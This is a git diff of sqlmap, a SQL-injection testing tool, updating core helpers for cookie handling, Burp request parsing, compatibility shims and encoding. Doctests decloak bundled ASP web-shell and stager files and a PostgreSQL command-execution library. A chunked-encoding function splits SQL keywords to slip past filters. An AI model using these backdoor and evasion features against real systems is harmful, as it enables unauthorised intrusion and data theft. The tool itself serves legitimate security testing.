six.string_types) else _) for _ in (conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) + retVal = conf.hashDB.retrieve(_, unserialize) if kb.resumeValues and not (checkConf and any((conf.flushSession, conf.freshQueries))) else None + + if not kb.inferenceMode and not kb.fileReadMode and isinstance(retVal, six.string_types) and any(_ in retVal for _ in (PARTIAL_VALUE_MARKER, PARTIAL_HEX_VALUE_MARKER)): + retVal = None + + return retVal def resetCookieJar(cookieJar): """ @@ -3244,52 +5102,118 @@ def resetCookieJar(cookieJar): cookieJar.clear() else: try: - cookieJar.load(conf.loadCookies) + if not cookieJar.filename: + infoMsg = "loading cookies from '%s'" % conf.loadCookies + logger.info(infoMsg) + + content = readCachedFileContent(conf.loadCookies) + content = re.sub("(?im)^#httpOnly_", "", content) + lines = filterNone(line.strip() for line in content.split("\n") if not line.startswith('#')) + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.COOKIE_JAR) + os.close(handle) + + # Reference: http://www.hashbangcode.com/blog/netscape-http-cooke-file-parser-php-584.html + with openFile(filename, "w+") as f: + f.write("%s\n" % NETSCAPE_FORMAT_HEADER_COOKIES) + for line in lines: + _ = line.split("\t") + if len(_) == 7: + _[4] = FORCE_COOKIE_EXPIRATION_TIME + f.write("\n%s" % "\t".join(_)) + + cookieJar.filename = filename + + cookieJar.load(cookieJar.filename, ignore_expires=True) + + for cookie in cookieJar: + if getattr(cookie, "expires", MAX_INT) < time.time(): + warnMsg = "cookie '%s' has expired" % cookie + singleTimeWarnMessage(warnMsg) + cookieJar.clear_expired_cookies() - except cookielib.LoadError, msg: + + if not cookieJar._cookies: + errMsg = "no valid cookies found" + raise SqlmapGenericException(errMsg) + + except Exception as ex: errMsg = "there was a problem loading " - errMsg += "cookies file ('%s')" % msg + errMsg += "cookies file ('%s')" % re.sub(r"(cookies) file '[^']+'", r"\g<1>", getSafeExString(ex)) raise SqlmapGenericException(errMsg) def decloakToTemp(filename): """ Decloaks content of a given file to a temporary file with similar name and extension + + NOTE: using in-memory decloak() in docTests because of the "problem" on Windows platform + + >>> decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.asp_")).startswith(b'<%') + True + >>> decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoors", "backdoor.asp_")).startswith(b'<%') + True + >>> b'sys_eval' in decloak(os.path.join(paths.SQLMAP_UDF_PATH, "postgresql", "linux", "64", "11", "lib_postgresqludf_sys.so_")) + True """ content = decloak(filename) - _ = os.path.split(filename[:-1])[-1] - prefix, suffix = os.path.splitext(_) - prefix = prefix.split(os.extsep)[0] + + parts = os.path.split(filename[:-1])[-1].split('.') + prefix, suffix = parts[0], '.' 
+ parts[-1] handle, filename = tempfile.mkstemp(prefix=prefix, suffix=suffix) os.close(handle) - with open(filename, "w+b") as f: + + with openFile(filename, "w+b", encoding=None) as f: f.write(content) + return filename def prioritySortColumns(columns): """ Sorts given column names by length in ascending order while those containing string 'id' go first + + >>> prioritySortColumns(['password', 'userid', 'name', 'id']) + ['id', 'userid', 'name', 'password'] """ - _ = lambda x: x and "id" in x.lower() - return sorted(sorted(columns, key=len), lambda x, y: -1 if _(x) and not _(y) else 1 if not _(x) and _(y) else 0) + recompile = re.compile(r"^id|id$", re.I) + + return sorted(columns, key=lambda col: ( + not (col and recompile.search(col)), + len(col) + )) def getRequestHeader(request, name): """ Solving an issue with an urllib2 Request header case sensitivity - Reference: http://bugs.python.org/issue2275 + # Reference: http://bugs.python.org/issue2275 + + >>> _ = lambda _: _ + >>> _.headers = {"FOO": "BAR"} + >>> _.header_items = lambda: _.headers.items() + >>> getText(getRequestHeader(_, "foo")) + 'BAR' """ retVal = None - if request and name: - retVal = max(request.get_header(_) if name.upper() == _.upper() else None for _ in request.headers.keys()) + + if request and request.headers and name: + _ = name.upper() + retVal = max(getBytes(value if _ == key.upper() else "") for key, value in request.header_items()) or None + return retVal def isNumber(value): """ Returns True if the given value is a number-like object + + >>> isNumber(1) + True + >>> isNumber('0') + True + >>> isNumber('foobar') + False """ try: @@ -3303,6 +5227,11 @@ def zeroDepthSearch(expression, value): """ Searches occurrences of value inside expression at 0-depth level regarding the parentheses + + >>> _ = "SELECT (SELECT id FROM users WHERE 2>1) AS result FROM DUAL"; _[zeroDepthSearch(_, "FROM")[0]:] + 'FROM DUAL' + >>> _ = "a(b; c),d;e"; _[zeroDepthSearch(_, "[;, ]")[0]:] + ',d;e' """ retVal = [] @@ -3313,14 +5242,21 @@ def zeroDepthSearch(expression, value): depth += 1 elif expression[index] == ')': depth -= 1 - elif depth == 0 and expression[index:index + len(value)] == value: - retVal.append(index) + elif depth == 0: + if value.startswith('[') and value.endswith(']'): + if re.search(value, expression[index:index + 1]): + retVal.append(index) + elif expression[index:index + len(value)] == value: + retVal.append(index) return retVal def splitFields(fields, delimiter=','): """ - Returns list of fields splitted by delimiter + Returns list of (0-depth) fields splitted by delimiter + + >>> splitFields('foo, bar, max(foo, bar)') + ['foo', 'bar', 'max(foo,bar)'] """ fields = fields.replace("%s " % delimiter, delimiter) @@ -3328,10 +5264,14 @@ def splitFields(fields, delimiter=','): commas.extend(zeroDepthSearch(fields, ',')) commas = sorted(commas) - return [fields[x + 1:y] for (x, y) in zip(commas, commas[1:])] + return [fields[x + 1:y] for (x, y) in _zip(commas, commas[1:])] def pollProcess(process, suppress_errors=False): - while True: + """ + Checks for process status (prints . 
if still running) + """ + + while process: dataToStdout(".") time.sleep(1) @@ -3347,3 +5287,362 @@ def pollProcess(process, suppress_errors=False): dataToStdout(" quit unexpectedly with return code %d\n" % returncode) break + +def parseRequestFile(reqFile, checkParams=True): + """ + Parses WebScarab and Burp logs and adds results to the target URL list + + >>> handle, reqFile = tempfile.mkstemp(suffix=".req") + >>> content = b"POST / HTTP/1.0\\nUser-agent: foobar\\nHost: www.example.com\\n\\nid=1\\n" + >>> _ = os.write(handle, content) + >>> os.close(handle) + >>> next(parseRequestFile(reqFile)) == ('http://www.example.com:80/', 'POST', 'id=1', None, (('User-agent', 'foobar'), ('Host', 'www.example.com'))) + True + """ + + def _parseWebScarabLog(content): + """ + Parses WebScarab logs (POST method not supported) + """ + + if WEBSCARAB_SPLITTER not in content: + return + + reqResList = content.split(WEBSCARAB_SPLITTER) + + for request in reqResList: + url = extractRegexResult(r"URL: (?P.+?)\n", request, re.I) + method = extractRegexResult(r"METHOD: (?P.+?)\n", request, re.I) + cookie = extractRegexResult(r"COOKIE: (?P.+?)\n", request, re.I) + + if not method or not url: + logger.debug("not a valid WebScarab log data") + continue + + if method.upper() == HTTPMETHOD.POST: + warnMsg = "POST requests from WebScarab logs aren't supported " + warnMsg += "as their body content is stored in separate files. " + warnMsg += "Nevertheless you can use -r to load them individually." + logger.warning(warnMsg) + continue + + if not (conf.scope and not re.search(conf.scope, url, re.I)): + yield (url, method, None, cookie, tuple()) + + def _parseBurpLog(content): + """ + Parses Burp logs + """ + + if not re.search(BURP_REQUEST_REGEX, content, re.I | re.S): + if re.search(BURP_XML_HISTORY_REGEX, content, re.I | re.S): + reqResList = [] + for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S): + port, request = match.groups() + try: + request = decodeBase64(request, binary=False) + except (binascii.Error, TypeError): + continue + _ = re.search(r"%s:.+" % re.escape(HTTP_HEADER.HOST), request) + if _: + host = _.group(0).strip() + if not re.search(r":\d+\Z", host) and int(port) != 80: + request = request.replace(host, "%s:%d" % (host, int(port))) + reqResList.append(request) + else: + reqResList = [content] + else: + reqResList = re.finditer(BURP_REQUEST_REGEX, content, re.I | re.S) + + for match in reqResList: + request = match if isinstance(match, six.string_types) else match.group(1) + request = re.sub(r"\A[^\w]+", "", request) + schemePort = re.search(r"(http[\w]*)\:\/\/.*?\:([\d]+).+?={10,}", request, re.I | re.S) + + if schemePort: + scheme = schemePort.group(1) + port = schemePort.group(2) + request = re.sub(r"\n=+\Z", "", request.split(schemePort.group(0))[-1].lstrip()) + else: + scheme, port = None, None + + if "HTTP/" not in request: + continue + + if re.search(r"^[\n]*%s[^?]*?\.(%s)\sHTTP\/" % (HTTPMETHOD.GET, "|".join(CRAWL_EXCLUDE_EXTENSIONS)), request, re.I | re.M): + if not re.search(r"^[\n]*%s[^\n]*\*[^\n]*\sHTTP\/" % HTTPMETHOD.GET, request, re.I | re.M): + continue + + getPostReq = False + forceBody = False + url = None + host = None + method = None + data = None + cookie = None + params = False + newline = None + lines = request.split('\n') + headers = [] + + for index in xrange(len(lines)): + line = lines[index] + + if not line.strip() and index == len(lines) - 1: + break + + line = re.sub(INJECT_HERE_REGEX, CUSTOM_INJECTION_MARK_CHAR, line) + + newline = "\r\n" if 
line.endswith('\r') else '\n' + line = line.strip('\r') + match = re.search(r"\A([A-Z]+) (.+) HTTP/[\d.]+\Z", line) if not method else None + + if len(line.strip()) == 0 and method and (method != HTTPMETHOD.GET or forceBody) and data is None: + data = "" + params = True + + elif match: + method = match.group(1) + url = match.group(2) + + if any(_ in line for _ in ('?', '=', kb.customInjectionMark)): + params = True + + getPostReq = True + + # POST parameters + elif data is not None and params: + data += "%s%s" % (line, newline) + + # GET parameters + elif "?" in line and "=" in line and ": " not in line: + params = True + + # Headers + elif re.search(r"\A\S+:", line): + key, value = line.split(":", 1) + value = value.strip().replace("\r", "").replace("\n", "") + + # Note: overriding values with --headers '...' + match = re.search(r"(?i)\b(%s): ([^\n]*)" % re.escape(key), conf.headers or "") + if match: + key, value = match.groups() + + # Cookie and Host headers + if key.upper() == HTTP_HEADER.COOKIE.upper(): + cookie = value + elif key.upper() == HTTP_HEADER.HOST.upper(): + if '://' in value: + scheme, value = value.split('://')[:2] + + port = extractRegexResult(r":(?P\d+)\Z", value) + if port: + host = value[:-(1 + len(port))] + else: + host = value + + # Avoid to add a static content length header to + # headers and consider the following lines as + # POSTed data + if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper(): + forceBody = True + params = True + + # Avoid proxy and connection type related headers + elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION, HTTP_HEADER.IF_MODIFIED_SINCE, HTTP_HEADER.IF_NONE_MATCH): + headers.append((getUnicode(key), getUnicode(value))) + + if kb.customInjectionMark in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""): + params = True + + data = data.rstrip("\r\n") if data else data + + if getPostReq and (params or cookie or not checkParams): + if not port and hasattr(scheme, "lower") and scheme.lower() == "https": + port = "443" + elif not scheme and port == "443": + scheme = "https" + + if conf.forceSSL: + scheme = "https" + port = port or "443" + + if not host: + errMsg = "invalid format of a request file" + raise SqlmapSyntaxException(errMsg) + + if not url.startswith("http"): + url = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url) + scheme = None + port = None + + if not (conf.scope and not re.search(conf.scope, url, re.I)): + yield (url, conf.method or method, data, cookie, tuple(headers)) + + content = readCachedFileContent(reqFile) + + if conf.scope: + logger.info("using regular expression '%s' for filtering targets" % conf.scope) + + try: + re.compile(conf.scope) + except Exception as ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.scope, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + + for target in _parseBurpLog(content): + yield target + + for target in _parseWebScarabLog(content): + yield target + +def getSafeExString(ex, encoding=None): + """ + Safe way how to get the proper exception represtation as a string + + >>> getSafeExString(SqlmapBaseException('foobar')) == 'foobar' + True + >>> getSafeExString(OSError(0, 'foobar')) == 'OSError: foobar' + True + """ + + retVal = None + + if getattr(ex, "message", None): + retVal = ex.message + elif getattr(ex, "msg", None): + retVal = ex.msg + elif getattr(ex, "args", None): + for candidate in ex.args[::-1]: + if isinstance(candidate, six.string_types): + retVal = candidate + break + + if retVal is None: + retVal = str(ex) + 
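# ---------------------------------------------------------------------------
# Editor's note: illustrative sketch, not part of the patch. The new
# parseRequestFile() above rebuilds targets from raw Burp-style requests:
# request line first, then headers, then (after a blank line) the POST body,
# with the Host header supplying the target hostname. A bare-bones parser for
# a single raw request of the kind used in its doctest (no Burp/WebScarab
# framing, no scheme/port handling; names are the editor's):

def parse_raw_request(raw):
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    method, path, _ = lines[0].split(None, 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip()] = value.strip()
    url = "http://%s%s" % (headers.get("Host", ""), path)
    return url, method, body.strip() or None, headers

raw = "POST /login HTTP/1.0\nHost: www.example.com\nUser-agent: foobar\n\nid=1\n"
url, method, data, headers = parse_raw_request(raw)
assert (url, method, data) == ("http://www.example.com/login", "POST", "id=1")
assert headers["User-agent"] == "foobar"
# ---------------------------------------------------------------------------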
elif not isinstance(ex, SqlmapBaseException): + retVal = "%s: %s" % (type(ex).__name__, retVal) + + return getUnicode(retVal or "", encoding=encoding).strip() + +def safeVariableNaming(value): + """ + Returns escaped safe-representation of a given variable name that can be used in Python evaluated code + + >>> safeVariableNaming("class.id") == "EVAL_636c6173732e6964" + True + """ + + if value in keyword.kwlist or re.search(r"\A[^a-zA-Z]|[^\w]", value): + value = "%s%s" % (EVALCODE_ENCODED_PREFIX, getUnicode(binascii.hexlify(getBytes(value)))) + + return value + +def unsafeVariableNaming(value): + """ + Returns unescaped safe-representation of a given variable name + + >>> unsafeVariableNaming("EVAL_636c6173732e6964") == "class.id" + True + """ + + if value.startswith(EVALCODE_ENCODED_PREFIX): + value = decodeHex(value[len(EVALCODE_ENCODED_PREFIX):], binary=False) + + return value + +def firstNotNone(*args): + """ + Returns first not-None value from a given list of arguments + + >>> firstNotNone(None, None, 1, 2, 3) + 1 + """ + + retVal = None + + for _ in args: + if _ is not None: + retVal = _ + break + + return retVal + +def removePostHintPrefix(value): + """ + Remove POST hint prefix from a given value (name) + + >>> removePostHintPrefix("JSON id") + 'id' + >>> removePostHintPrefix("id") + 'id' + """ + + return re.sub(r"\A(%s) " % '|'.join(re.escape(__) for __ in getPublicTypeMembers(POST_HINT, onlyValues=True)), "", value) + + +def chunkSplitPostData(data): + """ + Convert POST data to chunked transfer-encoded data (Note: splitting done by SQL keywords) + + >>> random.seed(0) + >>> chunkSplitPostData("SELECT username,password FROM users") + '5;4Xe90\\r\\nSELEC\\r\\n3;irWlc\\r\\nT u\\r\\n1;eT4zO\\r\\ns\\r\\n5;YB4hM\\r\\nernam\\r\\n9;2pUD8\\r\\ne,passwor\\r\\n3;mp07y\\r\\nd F\\r\\n5;8RKXi\\r\\nROM u\\r\\n4;MvMhO\\r\\nsers\\r\\n0\\r\\n\\r\\n' + """ + + length = len(data) + retVal = [] + index = 0 + + while index < length: + chunkSize = randomInt(1) + + if index + chunkSize >= length: + chunkSize = length - index + + salt = randomStr(5, alphabet=string.ascii_letters + string.digits) + + while chunkSize: + candidate = data[index:index + chunkSize] + + if re.search(r"\b%s\b" % '|'.join(HTTP_CHUNKED_SPLIT_KEYWORDS), candidate, re.I): + chunkSize -= 1 + else: + break + + index += chunkSize + + # Append to list instead of recreating the string + retVal.append("%x;%s\r\n" % (chunkSize, salt)) + retVal.append("%s\r\n" % candidate) + + retVal.append("0\r\n\r\n") + + return "".join(retVal) + +def checkSums(): + """ + Validate the content of the digest file (i.e. 
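# ---------------------------------------------------------------------------
# Editor's note: illustrative sketch, not part of the patch. The new
# chunkSplitPostData() above re-encodes a POST body with HTTP chunked
# transfer encoding, deliberately picking chunk sizes so that no single chunk
# contains a whole SQL keyword (which helps against naive keyword filters).
# A minimal encoder showing just the chunked framing, with fixed chunk sizes
# and without the keyword-splitting logic or the randomized chunk extensions
# used by the patch:

def chunk_encode(data, size=5):
    parts = []
    for index in range(0, len(data), size):
        piece = data[index:index + size]
        parts.append("%x\r\n%s\r\n" % (len(piece), piece))
    parts.append("0\r\n\r\n")             # zero-length chunk terminates the body
    return "".join(parts)

encoded = chunk_encode("SELECT username FROM users")
assert encoded.startswith("5\r\nSELEC\r\n")
assert encoded.endswith("0\r\n\r\n")
# ---------------------------------------------------------------------------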
sha256sums.txt) + >>> checkSums() + True + """ + + retVal = True + + if paths.get("DIGEST_FILE"): + for entry in getFileItems(paths.DIGEST_FILE): + match = re.search(r"([0-9a-f]+)\s+([^\s]+)", entry) + if match: + expected, filename = match.groups() + filepath = os.path.join(paths.SQLMAP_ROOT_PATH, filename).replace('/', os.path.sep) + if not checkFile(filepath, False): + continue + with open(filepath, "rb") as f: + content = f.read() + if b'\0' not in content: + content = content.replace(b"\r\n", b"\n") + if not hashlib.sha256(content).hexdigest() == expected: + retVal &= False + break + + return retVal diff --git a/lib/core/compat.py b/lib/core/compat.py new file mode 100644 index 00000000000..7020863da46 --- /dev/null +++ b/lib/core/compat.py @@ -0,0 +1,429 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from __future__ import division + +import codecs +import binascii +import functools +import io +import math +import os +import random +import re +import sys +import time +import uuid + +class WichmannHill(random.Random): + """ + Reference: https://svn.python.org/projects/python/trunk/Lib/random.py + """ + + VERSION = 1 # used by getstate/setstate + + def seed(self, a=None): + """Initialize internal state from hashable object. + + None or no argument seeds from current time or from an operating + system specific randomness source if available. + + If a is not None or an int or long, hash(a) is used instead. + + If a is an int or long, a is used directly. Distinct values between + 0 and 27814431486575L inclusive are guaranteed to yield distinct + internal states (this guarantee is specific to the default + Wichmann-Hill generator). + """ + + if a is None: + try: + a = int(binascii.hexlify(os.urandom(16)), 16) + except NotImplementedError: + a = int(time.time() * 256) # use fractional seconds + + if not isinstance(a, int): + a = hash(a) + + a, x = divmod(a, 30268) + a, y = divmod(a, 30306) + a, z = divmod(a, 30322) + self._seed = int(x) + 1, int(y) + 1, int(z) + 1 + + self.gauss_next = None + + def random(self): + """Get the next random number in the range [0.0, 1.0).""" + + # Wichman-Hill random number generator. + # + # Wichmann, B. A. & Hill, I. D. (1982) + # Algorithm AS 183: + # An efficient and portable pseudo-random number generator + # Applied Statistics 31 (1982) 188-190 + # + # see also: + # Correction to Algorithm AS 183 + # Applied Statistics 33 (1984) 123 + # + # McLeod, A. I. (1985) + # A remark on Algorithm AS 183 + # Applied Statistics 34 (1985),198-200 + + # This part is thread-unsafe: + # BEGIN CRITICAL SECTION + x, y, z = self._seed + x = (171 * x) % 30269 + y = (172 * y) % 30307 + z = (170 * z) % 30323 + self._seed = x, y, z + # END CRITICAL SECTION + + # Note: on a platform using IEEE-754 double arithmetic, this can + # never return 0.0 (asserted by Tim; proof too long for a comment). 
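# ---------------------------------------------------------------------------
# Editor's note: illustrative sketch, not part of the patch. The new
# checkSums() above re-hashes every file listed in the digest file (after
# normalizing CRLF to LF for text content) and compares the result against
# the recorded SHA-256 value. The core verification step for a single
# "<hexdigest>  <filename>" entry (simplified, no path remapping; names are
# the editor's):

import hashlib
import re

def verify_entry(entry, content):
    match = re.search(r"([0-9a-f]{64})\s+(\S+)", entry)
    if not match:
        return False
    expected = match.group(1)
    if b"\0" not in content:              # treat as text: normalize line endings
        content = content.replace(b"\r\n", b"\n")
    return hashlib.sha256(content).hexdigest() == expected

data = b"print('hello')\r\n"
digest = hashlib.sha256(b"print('hello')\n").hexdigest()
assert verify_entry("%s  demo.py" % digest, data)
# ---------------------------------------------------------------------------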
+ return (x / 30269.0 + y / 30307.0 + z / 30323.0) % 1.0 + + def getstate(self): + """Return internal state; can be passed to setstate() later.""" + return self.VERSION, self._seed, self.gauss_next + + def setstate(self, state): + """Restore internal state from object returned by getstate().""" + version = state[0] + if version == 1: + version, self._seed, self.gauss_next = state + else: + raise ValueError("state with version %s passed to " + "Random.setstate() of version %s" % + (version, self.VERSION)) + + def jumpahead(self, n): + """Act as if n calls to random() were made, but quickly. + + n is an int, greater than or equal to 0. + + Example use: If you have 2 threads and know that each will + consume no more than a million random numbers, create two Random + objects r1 and r2, then do + r2.setstate(r1.getstate()) + r2.jumpahead(1000000) + Then r1 and r2 will use guaranteed-disjoint segments of the full + period. + """ + + if n < 0: + raise ValueError("n must be >= 0") + x, y, z = self._seed + x = int(x * pow(171, n, 30269)) % 30269 + y = int(y * pow(172, n, 30307)) % 30307 + z = int(z * pow(170, n, 30323)) % 30323 + self._seed = x, y, z + + def __whseed(self, x=0, y=0, z=0): + """Set the Wichmann-Hill seed from (x, y, z). + + These must be integers in the range [0, 256). + """ + + if not type(x) == type(y) == type(z) == int: + raise TypeError('seeds must be integers') + if not (0 <= x < 256 and 0 <= y < 256 and 0 <= z < 256): + raise ValueError('seeds must be in range(0, 256)') + if 0 == x == y == z: + # Initialize from current time + t = int(time.time() * 256) + t = int((t & 0xffffff) ^ (t >> 24)) + t, x = divmod(t, 256) + t, y = divmod(t, 256) + t, z = divmod(t, 256) + # Zero is a poor seed, so substitute 1 + self._seed = (x or 1, y or 1, z or 1) + + self.gauss_next = None + + def whseed(self, a=None): + """Seed from hashable object's hash code. + + None or no argument seeds from current time. It is not guaranteed + that objects with distinct hash codes lead to distinct internal + states. + + This is obsolete, provided for compatibility with the seed routine + used prior to Python 2.1. Use the .seed() method instead. 
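+
+        Example (illustrative):
+
+        >>> rnd = WichmannHill()
+        >>> rnd.whseed(42)
+        >>> 0.0 <= rnd.random() < 1.0
+        True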
+ """ + + if a is None: + self.__whseed() + return + a = hash(a) + a, x = divmod(a, 256) + a, y = divmod(a, 256) + a, z = divmod(a, 256) + x = (x + a) % 256 or 1 + y = (y + a) % 256 or 1 + z = (z + a) % 256 or 1 + self.__whseed(x, y, z) + +def patchHeaders(headers): + if headers is not None and not hasattr(headers, "headers"): + if isinstance(headers, dict): + class _(dict): + def __getitem__(self, key): + for key_ in self: + if key_.lower() == key.lower(): + return super(_, self).__getitem__(key_) + + raise KeyError(key) + + def get(self, key, default=None): + try: + return self[key] + except KeyError: + return default + + headers = _(headers) + + headers.headers = ["%s: %s\r\n" % (header, headers[header]) for header in headers] + + return headers + +def cmp(a, b): + """ + >>> cmp("a", "b") + -1 + >>> cmp(2, 1) + 1 + """ + + if a < b: + return -1 + elif a > b: + return 1 + else: + return 0 + +# Reference: https://github.com/urllib3/urllib3/blob/master/src/urllib3/filepost.py +def choose_boundary(): + """ + >>> len(choose_boundary()) == 32 + True + """ + + retval = "" + + try: + retval = uuid.uuid4().hex + except AttributeError: + retval = "".join(random.sample("0123456789abcdef", 1)[0] for _ in xrange(32)) + + return retval + +# Reference: http://python3porting.com/differences.html +def round(x, d=0): + """ + >>> round(2.0) + 2.0 + >>> round(2.5) + 3.0 + """ + + p = 10 ** d + if x > 0: + return float(math.floor((x * p) + 0.5)) / p + else: + return float(math.ceil((x * p) - 0.5)) / p + +# Reference: https://code.activestate.com/recipes/576653-convert-a-cmp-function-to-a-key-function/ +def cmp_to_key(mycmp): + """Convert a cmp= function into a key= function""" + class K(object): + __slots__ = ['obj'] + + def __init__(self, obj, *args): + self.obj = obj + + def __lt__(self, other): + return mycmp(self.obj, other.obj) < 0 + + def __gt__(self, other): + return mycmp(self.obj, other.obj) > 0 + + def __eq__(self, other): + return mycmp(self.obj, other.obj) == 0 + + def __le__(self, other): + return mycmp(self.obj, other.obj) <= 0 + + def __ge__(self, other): + return mycmp(self.obj, other.obj) >= 0 + + def __ne__(self, other): + return mycmp(self.obj, other.obj) != 0 + + def __hash__(self): + raise TypeError('hash not implemented') + + return K + +# Note: patch for Python 2.6 +if not hasattr(functools, "cmp_to_key"): + functools.cmp_to_key = cmp_to_key + +if sys.version_info >= (3, 0): + xrange = range + buffer = memoryview +else: + xrange = xrange + buffer = buffer + +def LooseVersion(version): + """ + >>> LooseVersion("1.0") == LooseVersion("1.0") + True + >>> LooseVersion("1.0.1") > LooseVersion("1.0") + True + >>> LooseVersion("1.0.1-") == LooseVersion("1.0.1") + True + >>> LooseVersion("1.0.11") < LooseVersion("1.0.111") + True + >>> LooseVersion("foobar") > LooseVersion("1.0") + False + >>> LooseVersion("1.0") > LooseVersion("foobar") + False + >>> LooseVersion("3.22-mysql") == LooseVersion("3.22-mysql-ubuntu0.3") + True + >>> LooseVersion("8.0.22-0ubuntu0.20.04.2") + 8.000022 + """ + + match = re.search(r"\A(\d[\d.]*)", version or "") + + if match: + result = 0 + value = match.group(1) + weight = 1.0 + for part in value.strip('.').split('.'): + if part.isdigit(): + result += int(part) * weight + weight *= 1e-3 + else: + result = float("NaN") + + return result + +# NOTE: codecs.open re-implementation (deprecated in Python 3.14) + +try: + # Py2 + _text_type = unicode + _bytes_types = (str, bytearray) +except NameError: + # Py3 + _text_type = str + _bytes_types = (bytes, bytearray, 
memoryview) + +_WRITE_CHARS = ("w", "a", "x", "+") + +def _is_write_mode(mode): + return any(ch in mode for ch in _WRITE_CHARS) + +class MixedWriteTextIO(object): + """ + Text-ish stream wrapper that accepts both text and bytes in write(). + Bytes are decoded using the file's (encoding, errors) before writing. + + Optionally approximates line-buffering by flushing when a newline is written. + """ + def __init__(self, fh, encoding, errors, line_buffered=False): + self._fh = fh + self._encoding = encoding + self._errors = errors + self._line_buffered = line_buffered + + def write(self, data): + # bytes-like but not text -> decode + if isinstance(data, _bytes_types) and not isinstance(data, _text_type): + data = bytes(data).decode(self._encoding, self._errors) + elif not isinstance(data, _text_type): + data = _text_type(data) + + n = self._fh.write(data) + + # Approximate "line buffering" behavior if requested + if self._line_buffered and u"\n" in data: + try: + self._fh.flush() + except Exception: + pass + + return n + + def writelines(self, lines): + for x in lines: + self.write(x) + + def __iter__(self): + return iter(self._fh) + + def __next__(self): + return next(self._fh) + + def next(self): # Py2 + return self.__next__() + + def __getattr__(self, name): + return getattr(self._fh, name) + + def __enter__(self): + self._fh.__enter__() + return self + + def __exit__(self, exc_type, exc, tb): + return self._fh.__exit__(exc_type, exc, tb) + + +def _codecs_open(filename, mode="r", encoding=None, errors="strict", buffering=-1): + """ + Replacement for deprecated codecs.open() entry point with sqlmap-friendly behavior. + + - If encoding is None: return io.open(...) as-is. + - If encoding is set: force underlying binary mode and wrap via StreamReaderWriter + (like codecs.open()). + - For write-ish modes: return a wrapper that also accepts bytes on .write(). + - Handles buffering=1 in binary mode by downgrading underlying buffering to -1, + while optionally preserving "flush on newline" behavior in the wrapper. 
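+
+    Illustrative usage of this replacement (hypothetical filename):
+
+        with _codecs_open("session.log", "ab", "utf8") as fp:
+            fp.write(u"text is encoded with the given codec")
+            fp.write(b" while bytes are decoded first (write-ish modes only)")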
+ """ + if encoding is None: + return io.open(filename, mode, buffering=buffering) + + bmode = mode + if "b" not in bmode: + bmode += "b" + + # Avoid line-buffering warnings/errors on binary streams + line_buffered = (buffering == 1) + if line_buffered: + buffering = -1 + + f = io.open(filename, bmode, buffering=buffering) + + try: + info = codecs.lookup(encoding) + srw = codecs.StreamReaderWriter(f, info.streamreader, info.streamwriter, errors) + srw.encoding = encoding + + if _is_write_mode(mode): + return MixedWriteTextIO(srw, encoding, errors, line_buffered=line_buffered) + + return srw + except Exception: + try: + f.close() + finally: + raise + +codecs_open = _codecs_open if sys.version_info >= (3, 14) else codecs.open diff --git a/lib/core/convert.py b/lib/core/convert.py index 28afe17bdba..0b4cddd739e 100644 --- a/lib/core/convert.py +++ b/lib/core/convert.py @@ -1,109 +1,472 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +try: + import cPickle as pickle +except: + import pickle + +import base64 +import binascii +import codecs import json -import pickle +import re import sys +import time +from lib.core.bigarray import BigArray +from lib.core.compat import xrange +from lib.core.data import conf +from lib.core.data import kb +from lib.core.settings import INVALID_UNICODE_PRIVATE_AREA +from lib.core.settings import IS_TTY from lib.core.settings import IS_WIN +from lib.core.settings import NULL +from lib.core.settings import PICKLE_PROTOCOL +from lib.core.settings import SAFE_HEX_MARKER from lib.core.settings import UNICODE_ENCODING +from thirdparty import six +from thirdparty.six import unichr as _unichr +from thirdparty.six.moves import html_parser +from thirdparty.six.moves import collections_abc as _collections -def base64decode(value): - return value.decode("base64") - -def base64encode(value): - return value.encode("base64")[:-1].replace("\n", "") +try: + from html import escape as htmlEscape +except ImportError: + from cgi import escape as htmlEscape def base64pickle(value): + """ + Serializes (with pickle) and encodes to Base64 format supplied (binary) value + + >>> base64unpickle(base64pickle([1, 2, 3])) == [1, 2, 3] + True + """ + retVal = None + try: - retVal = base64encode(pickle.dumps(value, pickle.HIGHEST_PROTOCOL)) + retVal = encodeBase64(pickle.dumps(value, PICKLE_PROTOCOL), binary=False) except: warnMsg = "problem occurred while serializing " warnMsg += "instance of a type '%s'" % type(value) singleTimeWarnMessage(warnMsg) - retVal = base64encode(pickle.dumps(str(value), pickle.HIGHEST_PROTOCOL)) + try: + retVal = encodeBase64(pickle.dumps(value), binary=False) + except: + raise + return retVal def base64unpickle(value): - return pickle.loads(base64decode(value)) + """ + Decodes value from Base64 to plain format and deserializes (with pickle) its content + + >>> type(base64unpickle('gAJjX19idWlsdGluX18Kb2JqZWN0CnEBKYFxAi4=')) == object + True + """ + + retVal = None + + try: + retVal = pickle.loads(decodeBase64(value)) + except TypeError: + retVal = pickle.loads(decodeBase64(bytes(value))) + + return retVal -def hexdecode(value): - value = value.lower() - return (value[2:] if value.startswith("0x") else value).decode("hex") +def htmlUnescape(value): + """ + Returns HTML unescaped value + + >>> htmlUnescape('a<b') == 'a>> htmlUnescape('a<b') == 'a>> 
